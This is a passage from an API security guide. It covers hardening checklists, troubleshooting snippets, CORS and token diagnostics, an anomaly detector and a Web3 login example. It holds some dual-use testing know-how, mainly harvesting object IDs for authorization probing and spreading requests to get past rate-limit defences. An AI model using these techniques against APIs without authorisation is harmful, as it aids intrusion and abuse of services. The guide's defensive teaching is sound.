- [ ] Monitor for and alert on abnormal request patterns
- Logging and Monitoring
- [ ] Log all API access with appropriate detail
- [ ] Include correlation IDs for request tracing
- [ ] Monitor for unusual activity patterns
- [ ] Implement alerts for security-related events
- [ ] Ensure logs are tamper-proof and preserved for auditing
- Transport Security
- [ ] Use TLS 1.2+ for all API traffic
- [ ] Implement proper certificate validation
- [ ] Use strong cipher suites
- [ ] Consider mutual TLS for high-security environments
- [ ] Implement HSTS headers
- API Design
- [ ] Follow RESTful conventions or GraphQL best practices
- [ ] Use resource-based URLs and appropriate HTTP methods
- [ ] Implement proper HTTP status codes
- [ ] Version your APIs
- [ ] Use nouns for resources, not verbs
- Infrastructure Security
- [ ] Keep all components updated with security patches
- [ ] Use a Web Application Firewall (WAF)
- [ ] Implement network segmentation
- [ ] Consider containerization for isolation
- [ ] Run regular vulnerability scans
- Documentation and Testing
- [ ] Document security requirements and controls
- [ ] Perform regular security testing
- [ ] Conduct penetration testing
- [ ] Include security in CI/CD pipeline
- [ ] Maintain a responsible disclosure program
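Two checklist items work well together: consistent error messages that don't leak information, and correlation IDs for request tracing. Here is a minimal sketch of that pairing, assuming a plain dictionary is serialized as the response body; `build_error_response`, the logger name, and the message table are illustrative choices.

```python
import logging
import uuid
from typing import Optional

logger = logging.getLogger("api.errors")

# Generic client-facing messages keyed by status code (illustrative values).
PUBLIC_MESSAGES = {
    400: "Invalid request",
    401: "Authentication required",
    403: "Access denied",
    404: "Resource not found",
}


def build_error_response(
    status_code: int,
    internal_error: Exception,
    correlation_id: Optional[str] = None,
) -> dict:
    """Log the real error server-side and return a generic body for the client."""
    correlation_id = correlation_id or str(uuid.uuid4())
    # Full detail goes to the log only, tagged with the ID the client will see
    logger.error("request failed [%s]: %r", correlation_id, internal_error)
    return {
        "status": status_code,
        "error": PUBLIC_MESSAGES.get(status_code, "Internal server error"),
        "correlation_id": correlation_id,
    }
```

The client gets enough to report the problem, and support staff can look up the full exception by correlation ID without stack traces or SQL fragments ever reaching the response.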
Common Pitfalls & Troubleshooting
API Testing Challenges
Challenge | Description | Solution |
---|---|---|
Authentication Complexity | Modern APIs use complex auth flows like OAuth2 | Use specialized tools like Postman's auth helpers or write custom auth scripts |
Maintaining State | Tests require maintaining session state | Create proper setup/teardown flows to manage state between tests |
Rate Limiting | API defenses block excessive testing | Implement delays between requests, distribute testing, obtain higher rate limits for testing |
Dynamic Endpoints | API endpoints change based on data or UUIDs | Create discovery flows that find valid IDs before testing endpoints |
API Gateway Complexity | Multiple layers of protection in modern APIs | Test each layer independently before testing the entire stack |
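For the "Dynamic Endpoints" row, a discovery flow usually starts by harvesting identifiers from responses you can already read. This sketch walks a decoded JSON body and collects values that look like IDs; the key-name heuristics (`id`, `uuid`, anything ending in `_id`) are assumptions that you would tune per API.

```python
import re
from typing import Any, Set, Tuple

UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$",
    re.IGNORECASE,
)


def collect_ids(payload: Any, id_keys: Tuple[str, ...] = ("id", "uuid")) -> Set[str]:
    """Recursively collect identifier values from a decoded JSON response."""
    found: Set[str] = set()
    if isinstance(payload, dict):
        for key, value in payload.items():
            is_id_key = key.lower() in id_keys or key.lower().endswith("_id")
            is_scalar = isinstance(value, (str, int)) and not isinstance(value, bool)
            if is_id_key and is_scalar:
                found.add(str(value))
            else:
                found |= collect_ids(value, id_keys)
    elif isinstance(payload, list):
        for item in payload:
            found |= collect_ids(item, id_keys)
    elif isinstance(payload, str) and UUID_RE.match(payload):
        # UUID-shaped strings are collected even under non-ID keys
        found.add(payload)
    return found
```

Feeding the collected IDs into object-level endpoints such as `/users/{id}` gives you valid targets for authorization tests instead of guessing.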
Troubleshooting Common Issues
When API testing fails, follow this systematic approach:
1. Authentication Issues
# Check if your token is valid
curl -I "https://api.example.com/health" \
-H "Authorization: Bearer YOUR_TOKEN"
# If you get a 401/403, refresh your token
curl -X POST "https://auth.example.com/token" \
-d "grant_type=refresh_token&refresh_token=YOUR_REFRESH_TOKEN"
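Before requesting a new token, it often helps to check locally whether the current one has simply expired. The sketch below decodes a JWT's payload without verifying the signature, which is fine for diagnostics but must never be used to make trust decisions; the helper names are my own.

```python
import base64
import json
import time
from typing import Optional


def decode_jwt_claims(token: str) -> dict:
    """Decode the payload segment of a JWT WITHOUT verifying the signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("Not a compact JWT (expected three dot-separated segments)")
    payload = parts[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def seconds_until_expiry(token: str, now: Optional[float] = None) -> Optional[int]:
    """Return seconds until `exp` (negative if expired), or None if there is no `exp`."""
    exp = decode_jwt_claims(token).get("exp")
    if exp is None:
        return None
    current = time.time() if now is None else now
    return int(exp - current)
```

A negative result points to an expired token. A positive one suggests the 401/403 has another cause, such as a wrong audience, missing scope, or revoked session.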
2. Input Validation Problems
// Common causes of validation errors:
// 1. Incorrect data types
const data = {
userId: "123", // Should be numeric: 123
amount: "50.5", // Should be numeric: 50.5
active: "true" // Should be boolean: true
};
// 2. Missing required fields
const incompleteData = {
// Missing required 'email' field
name: "John Doe",
role: "user"
};
// 3. Value outside acceptable range
const invalidRangeData = {
age: -5, // Should be positive
percentage: 120 // Should be 0-100
};
// Fix: Properly validate local data before sending
const validateUserData = (data) => {
const errors = [];
if (!data.email) errors.push("Email is required");
if (typeof data.age !== 'number' || data.age < 0) errors.push("Age must be a positive number");
// Add more validations...
return errors.length ? errors : null;
};
3. Rate Limiting Detection and Handling
import time
def handle_rate_limits(response, retry_after_default=60):
"""Handle rate limit responses with appropriate backoff"""
if response.status_code == 429:
# Try to get retry time from headers
retry_after = response.headers.get('Retry-After')
wait_time = int(retry_after) if retry_after and retry_after.isdigit() else retry_after_default
print(f"Rate limited. Waiting {wait_time} seconds before retry.")
time.sleep(wait_time)
return True
# Also check for custom rate limit headers
remaining = response.headers.get('X-RateLimit-Remaining')
# Guard against non-numeric header values before converting
if remaining and remaining.isdigit() and int(remaining) < 5:
print(f"Almost rate limited ({remaining} requests left). Adding delay.")
time.sleep(2) # Add small delay when close to limit
return False
4. Diagnosing Request/Response Issues
// Create a debugging proxy for API calls
const axios = require('axios');
// Create a debugging wrapper around axios
const debugAxios = axios.create();
// Add request interceptor
debugAxios.interceptors.request.use(request => {
console.log('──────────────── REQUEST ────────────────');
console.log('URL:', request.url);
console.log('Method:', request.method.toUpperCase());
console.log('Headers:', JSON.stringify(request.headers, null, 2));
if (request.data) {
console.log('Body:', typeof request.data === 'object' ?
JSON.stringify(request.data, null, 2) : request.data);
}
return request;
}, error => {
console.error('Request Error:', error);
return Promise.reject(error);
});
// Add response interceptor
debugAxios.interceptors.response.use(response => {
console.log('──────────────── RESPONSE ────────────────');
console.log('Status:', response.status, response.statusText);
console.log('Headers:', JSON.stringify(response.headers, null, 2));
console.log('Body:', typeof response.data === 'object' ?
JSON.stringify(response.data, null, 2) : response.data);
return response;
}, error => {
if (error.response) {
console.log('──────────────── ERROR RESPONSE ────────────────');
console.log('Status:', error.response.status, error.response.statusText);
console.log('Headers:', JSON.stringify(error.response.headers, null, 2));
console.log('Body:', typeof error.response.data === 'object' ?
JSON.stringify(error.response.data, null, 2) : error.response.data);
} else {
console.error('Response Error:', error.message);
}
return Promise.reject(error);
});
// Use the debugging axios for API calls
debugAxios.get('https://api.example.com/users')
.then(response => {
// Process the response
})
.catch(error => {
// Handle errors
});
When Your Tools Fail: Manual API Testing
When automated tools fail, these manual techniques can help:
# Base curl commands for manual testing
# 1. Basic GET request
curl -v "https://api.example.com/endpoint"
# 2. POST with JSON
curl -v -X POST "https://api.example.com/users" \
-H "Content-Type: application/json" \
-d '{"name": "Test User", "email": "test@example.com"}'
# 3. Test with custom headers
curl -v "https://api.example.com/protected-resource" \
-H "Authorization: Bearer test-token" \
-H "X-Custom-Header: Value"
# 4. Test for CORS issues
curl -v -X OPTIONS "https://api.example.com/users" \
-H "Origin: https://example.org" \
-H "Access-Control-Request-Method: POST" \
-H "Access-Control-Request-Headers: Content-Type, Authorization"
# 5. Test with client certificate
curl -v "https://api.example.com/secure-endpoint" \
--cert ./client.crt \
--key ./client.key
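The CORS preflight in step 4 only helps if you know how to read the response headers. Here is a small sketch that turns them into finding codes, assuming the test origin is one the API should not trust (as `https://example.org` is in the curl command). The function name and the finding codes are illustrative.

```python
from typing import List, Mapping


def cors_findings(test_origin: str, response_headers: Mapping[str, str]) -> List[str]:
    """Return short finding codes for a preflight response to `test_origin`."""
    headers = {name.lower(): value.strip() for name, value in response_headers.items()}
    allow_origin = headers.get("access-control-allow-origin")
    allow_credentials = headers.get("access-control-allow-credentials", "").lower() == "true"

    findings: List[str] = []
    if allow_origin is None:
        return findings  # no CORS grant: browsers will block cross-origin reads
    if allow_origin == "*":
        findings.append("wildcard-origin")
    elif allow_origin == "null":
        findings.append("null-origin")
    elif allow_origin == test_origin:
        findings.append("origin-allowed")
    # Credentials plus an attacker-controllable origin is the high-risk combination
    if allow_credentials and allow_origin in (test_origin, "null"):
        findings.append("credentials-with-allowed-origin")
    return findings
```

An `origin-allowed` result for an arbitrary origin usually means the server reflects the `Origin` header. Repeat the request with a second made-up origin to confirm.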
Future of API Security
Emerging Trends in API Security
- Zero Trust API Security Models
- Every API request is fully authenticated and authorized
- Continuous validation throughout the request lifecycle
- Micro-segmentation and granular access controls
- ML-Based API Anomaly Detection
- Learning normal API usage patterns
- Detecting anomalous behavior automatically
- Predicting and preventing zero-day attacks
- API Security in Serverless Architectures
- Function-level security policies
- Event-driven security models
- Ephemeral execution environments
- Continuous API Security Testing
- API security built into CI/CD pipelines
- Automated vulnerability scanning before deployment
- Runtime self-testing and adaptation
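As one concrete form of continuous testing, a pipeline step can fail the build when a scan reports serious findings. The sketch below reads a report shaped like the `vulnerabilities.json` file written by the GraphQL scanner earlier (a top-level `vulnerabilities` list whose entries carry a `severity`). The function names and the choice to block on unknown severities are my own assumptions.

```python
import json
from typing import List

SEVERITY_ORDER = ["low", "medium", "high", "critical"]


def blocking_findings(report: dict, fail_on: str = "high") -> List[dict]:
    """Return findings at or above the `fail_on` severity."""
    threshold = SEVERITY_ORDER.index(fail_on)
    blocked = []
    for vuln in report.get("vulnerabilities", []):
        severity = vuln.get("severity", "medium")
        # Unknown severity labels are treated as blocking (fail closed)
        rank = SEVERITY_ORDER.index(severity) if severity in SEVERITY_ORDER else threshold
        if rank >= threshold:
            blocked.append(vuln)
    return blocked


def gate_exit_code(report_path: str, fail_on: str = "high") -> int:
    """Return 1 if the report contains blocking findings, otherwise 0."""
    with open(report_path) as f:
        report = json.load(f)
    return 1 if blocking_findings(report, fail_on) else 0
```

In a pipeline you would pass the result to `sys.exit()` so that a non-zero status stops the deployment stage.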
Advanced API Attack and Defense Techniques
# Example: Next-gen API security using ML for request analysis
import numpy as np
import pandas as pd
from sklearn.ensemble import IsolationForest
import joblib
import time
class APIAnomalyDetector:
def __init__(self, model_path=None, training_data_path=None):
self.model = None
self.feature_columns = [
'request_size', 'num_parameters', 'response_time',
'status_code', 'hour_of_day', 'is_authenticated',
'parameter_entropy', 'repeated_parameters'
]
if model_path:
self.load_model(model_path)
elif training_data_path:
self.train_model(training_data_path)
def extract_features(self, request, response):
"""Extract features from request and response"""
features = {}
# Request features
features['request_size'] = len(request.get('body', ''))
features['num_parameters'] = len(request.get('params', {}))
# HTTP header names are case-insensitive, so compare in lowercase
features['is_authenticated'] = 1 if any(name.lower() == 'authorization' for name in request.get('headers', {})) else 0
# Calculate parameter entropy (randomness)
if request.get('params'):
param_values = ''.join(str(v) for v in request['params'].values())
features['parameter_entropy'] = self._calculate_entropy(param_values)
else:
features['parameter_entropy'] = 0
# Check for repeated parameters (potential fuzzing)
features['repeated_parameters'] = self._count_repeated_params(request.get('params', {}))
# Response features
features['response_time'] = response.get('time', 0)
features['status_code'] = response.get('status_code', 0)
# Time-based features
features['hour_of_day'] = time.localtime().tm_hour
return features
def _calculate_entropy(self, string_data):
"""Calculate Shannon entropy of a string"""
if not string_data:
return 0
# Calculate frequency of each character
freq = {}
for c in string_data:
freq[c] = freq.get(c, 0) + 1
# Calculate entropy
entropy = 0
for count in freq.values():
probability = count / len(string_data)
entropy -= probability * np.log2(probability)
return entropy
def _count_repeated_params(self, params):
"""Count parameters that appear to be repetitions or fuzzing"""
if not params:
return 0
# Look for similar parameter names (e.g., id1, id2, id3...)
param_prefixes = {}
for name in params.keys():
# Strip trailing digits so that id1, id2, id3 share the prefix "id"
prefix = name.rstrip('0123456789')
if prefix:
param_prefixes[prefix] = param_prefixes.get(prefix, 0) + 1
# Count parameters with same prefix
repeated = sum(count > 1 for count in param_prefixes.values())
return repeated
def train_model(self, training_data_path):
"""Train anomaly detection model"""
# Load training data
df = pd.read_csv(training_data_path)
# Make sure we have the right columns
for col in self.feature_columns:
if col not in df.columns:
raise ValueError(f"Training data missing required column: {col}")
# Prepare features
X = df[self.feature_columns].values
# Train isolation forest model
self.model = IsolationForest(
n_estimators=100,
max_samples='auto',
contamination=0.01, # Assume 1% of training data is anomalous
random_state=42
)
self.model.fit(X)
def save_model(self, model_path):
"""Save trained model"""
if self.model:
joblib.dump(self.model, model_path)
def load_model(self, model_path):
"""Load trained model"""
self.model = joblib.load(model_path)
def predict(self, request, response):
"""Predict if a request/response is anomalous"""
if not self.model:
raise ValueError("Model not trained or loaded")
# Extract features
features = self.extract_features(request, response)
# Convert to array in the right order
X = np.array([[features[col] for col in self.feature_columns]])
# Predict (-1 for anomaly, 1 for normal)
prediction = self.model.predict(X)[0]
# Get anomaly score (lower values are more anomalous; negative values indicate outliers)
score = self.model.decision_function(X)[0]
return {
'is_anomaly': prediction == -1,
'anomaly_score': score,
'features': features
}
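The `parameter_entropy` feature is the least intuitive input to the detector, so here is a standalone sketch of the same Shannon entropy calculation using only the standard library. It is a simplified restatement for experimentation, not a replacement for the class method.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in Counter(text).values())
```

Ordinary parameter values such as `page=1` tend to score lower than random-looking payloads, which is why unusually high entropy can hint at fuzzing, encoded payloads, or token guessing. Entropy alone produces false positives on legitimate tokens and hashes, so it works best as one feature among several.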
Decentralized API Security
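// Example: Decentralized API authentication using Web3
// Written against the ethers v5 API (ethers.providers.*, ethers.utils.*); ethers v6 moved these to the top-level namespace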
const ethers = require('ethers');
const crypto = require('crypto');
class Web3APIAuth {
constructor(providerUrl) {
this.provider = new ethers.providers.JsonRpcProvider(providerUrl);
}
/**
* Generate a challenge for the client to sign
*/
generateChallenge(address) {
const timestamp = Date.now();
const randomBytes = crypto.randomBytes(16).toString('hex');
const message = `Authenticate with API: ${randomBytes} at ${timestamp}`;
// Store challenge for verification (in a database in production)
this.pendingChallenges = this.pendingChallenges || {};
this.pendingChallenges[address] = {
message,
timestamp,
expires: timestamp + 5 * 60 * 1000 // 5 minutes
};
return {
address,
message,
timestamp
};
}
/**
* Verify a signed challenge
*/
async verifySignature(address, signature) {
// Check if we have a pending challenge
if (!this.pendingChallenges || !this.pendingChallenges[address]) {
throw new Error('No pending challenge found for this address');
}
const challenge = this.pendingChallenges[address];
// Check if challenge has expired
if (Date.now() > challenge.expires) {
delete this.pendingChallenges[address];
throw new Error('Challenge has expired');
}
try {
// Recover the address from the signature
const recoveredAddress = ethers.utils.verifyMessage(
challenge.message,
signature
);
// Check if recovered address matches the claimed address
if (recoveredAddress.toLowerCase() !== address.toLowerCase()) {
throw new Error('Signature verification failed');
}
// Cleanup
delete this.pendingChallenges[address];
// Get ENS name if available
let ensName = null;
try {
ensName = await this.provider.lookupAddress(address);
} catch (error) {
console.log('ENS lookup failed:', error.message);
}
// Return authentication result
return {
authenticated: true,
address,
ensName,
timestamp: Date.now()
};
} catch (error) {
throw new Error(`Signature verification failed: ${error.message}`);
}
}
/**
* Generate a JWT or similar token after successful authentication
*/
generateToken(authResult) {
// In a real implementation, this would create a JWT or similar token
// Simplified for example purposes
const payload = {
sub: authResult.address,
name: authResult.ensName || authResult.address.substring(0, 10),
iat: Math.floor(Date.now() / 1000),
exp: Math.floor(Date.now() / 1000) + (60 * 60) // 1 hour
};
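// WARNING: this only base64-encodes the payload. It is NOT signed, so anyone can forge it.
// Use a proper JWT library (for example jsonwebtoken) to sign tokens in production.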
const token = Buffer.from(JSON.stringify(payload)).toString('base64');
return {
token,
expires_in: 3600,
token_type: 'Bearer'
};
}
}
// Example usage in Express
const express = require('express');
const app = express();
app.use(express.json());
const auth = new Web3APIAuth('https://mainnet.infura.io/v3/YOUR_INFURA_KEY');
// Challenge generation endpoint
app.post('/api/auth/challenge', (req, res) => {
const { address } = req.body;
if (!address || !ethers.utils.isAddress(address)) {
return res.status(400).json({ error: 'Invalid Ethereum address' });
}
const challenge = auth.generateChallenge(address);
res.json(challenge);
});
// Authentication endpoint
app.post('/api/auth/verify', async (req, res) => {
const { address, signature } = req.body;
if (!address || !signature) {
return res.status(400).json({ error: 'Missing address or signature' });
}
try {
const authResult = await auth.verifySignature(address, signature);
const tokenResponse = auth.generateToken(authResult);
res.json(tokenResponse);
} catch (error) {
res.status(401).json({ error: error.message });
}
});
app.listen(3000, () => {
console.log('Web3 API auth server running on port 3000');
});
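The generateToken method above base64-encodes the payload without signing it, so a client could edit the `sub` claim and impersonate any address. The following is a minimal sketch of how signing and verification might look using only Node's built-in crypto module with HMAC-SHA256. The function names `signToken` and `verifyToken` and the way the secret is passed in are assumptions made for illustration, not part of the original class; a maintained JWT library remains the better choice in production.

```javascript
const crypto = require('crypto');

// Hypothetical helper: base64url-encode a string.
function base64url(input) {
  return Buffer.from(input).toString('base64url');
}

// Build a compact HS256 token: header.payload.signature
function signToken(payload, secret) {
  const header = { alg: 'HS256', typ: 'JWT' };
  const signingInput =
    `${base64url(JSON.stringify(header))}.${base64url(JSON.stringify(payload))}`;
  const signature = crypto
    .createHmac('sha256', secret)
    .update(signingInput)
    .digest('base64url');
  return `${signingInput}.${signature}`;
}

// Return the payload if the signature is valid and the token is unexpired, else null.
// The algorithm is fixed to HMAC-SHA256 here; the header's "alg" value is never trusted.
function verifyToken(token, secret) {
  const parts = String(token).split('.');
  if (parts.length !== 3) return null;
  const [headerPart, payloadPart, signaturePart] = parts;

  const expected = crypto
    .createHmac('sha256', secret)
    .update(`${headerPart}.${payloadPart}`)
    .digest();
  const actual = Buffer.from(signaturePart, 'base64url');

  // Constant-time comparison; timingSafeEqual requires equal lengths.
  if (actual.length !== expected.length ||
      !crypto.timingSafeEqual(actual, expected)) {
    return null;
  }

  const payload = JSON.parse(Buffer.from(payloadPart, 'base64url').toString('utf8'));
  const now = Math.floor(Date.now() / 1000);
  if (typeof payload.exp !== 'number' || payload.exp <= now) return null;
  return payload;
}
```

With something like this in place, a protected route would call `verifyToken` on the Bearer token of every request and reject the request when it returns null.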
Key Takeaways & Resources
API Security Core Principles
- Defense in Depth: Implement multiple layers of security controls
- Least Privilege: Provide minimum access necessary for functionality
- Zero Trust: Verify every request regardless of source
- Secure by Design: Build security into APIs from the beginning
- Continuous Validation: Constantly test and verify security controls
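As a rough illustration of how Least Privilege and Zero Trust can translate into code, the sketch below checks every request against an explicit route-to-scope policy and denies anything the policy does not mention. The routes, scope names, and the `isAuthorized` function are hypothetical and chosen only for the example.

```javascript
// Hypothetical policy: each route lists the scopes a caller must hold.
const REQUIRED_SCOPES = new Map([
  ['GET /api/accounts', ['accounts:read']],
  ['POST /api/transfers', ['accounts:read', 'transfers:write']],
]);

// Decide whether a request may proceed, given the scopes in its verified token.
function isAuthorized(method, path, grantedScopes) {
  const required = REQUIRED_SCOPES.get(`${method.toUpperCase()} ${path}`);
  // Deny by default: a route with no policy entry is rejected.
  if (!required) return false;
  const granted = new Set(grantedScopes || []);
  // Least privilege: every required scope must be present.
  return required.every((scope) => granted.has(scope));
}
```

Running a check like this on every request, including requests from internal services, is what keeps the policy from depending on where the caller sits in the network.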
Essential API Security Tools
- Postman: API testing and documentation
- OWASP ZAP: Security testing for APIs
- Burp Suite: Professional penetration testing
- Insomnia: API client with security testing features
- mitmproxy: Intercepting proxy for API traffic analysis
- APIKit: Custom API security testing framework
- TnT-Fuzzer: OpenAPI (Swagger) fuzzing tool
- Astra: REST API security testing automation
Recommended Resources
- Standards and Guidelines:
  - OWASP API Security Top 10
  - NIST Special Publication 800-95 (Guide to Secure Web Services)
  - API Security Best Practices by APISecurity.io
- Books:
  - "API Security in Action" by Neil Madden
  - "Hacking APIs" by Corey Ball
  - "Designing Web APIs" by Brenda Jin, Saurabh Sahni, and Amir Shevat
- Online Courses:
  - API Security on Pluralsight
  - Web Services & API Security on Coursera
  - Advanced API Security on Udemy
- Practice Environments:
  - OWASP Juice Shop
  - DVWS (Damn Vulnerable Web Services)
  - VAmPI (Vulnerable API)
Key Takeaways
- Comprehensive Testing: Apply a structured methodology across all APIs
- Automate Security: Build security tests into the CI/CD pipeline
- Know Your Data: Understand data sensitivity and protect accordingly
- Monitor Everything: Establish robust logging and monitoring
- Stay Updated: API security threats evolve rapidly
Remember: API security is a continuous process, not a one-time task. Regular assessments, continuous monitoring, and staying current with emerging threats are essential for maintaining a strong security posture.